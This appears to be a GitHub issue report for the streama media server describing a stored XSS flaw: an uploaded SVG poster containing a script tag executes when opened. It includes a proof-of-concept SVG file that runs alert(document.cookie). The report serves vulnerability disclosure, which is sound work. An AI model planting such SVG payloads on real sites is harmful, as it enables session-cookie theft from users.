streamaserver/streama

XSS in the Upload Poster feature using an SVG image

Open

#1,088 opened on Sep 13, 2021

View on GitHub
 (0 comments) (1 reaction) (0 assignees)JavaScript (977 forks)batch import
BugHelp wanted

Repository metrics

Stars
 (9,565 stars)
PR merge metrics
 (No merged PRs in 30d)

Description

If uploading a SVG file in the poster file browser containing a script tag, this script tag will be executed when opening the file. example file:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" id="mysvg">
<script>
alert(document.cookie);
</script>
</svg>

Contributor guide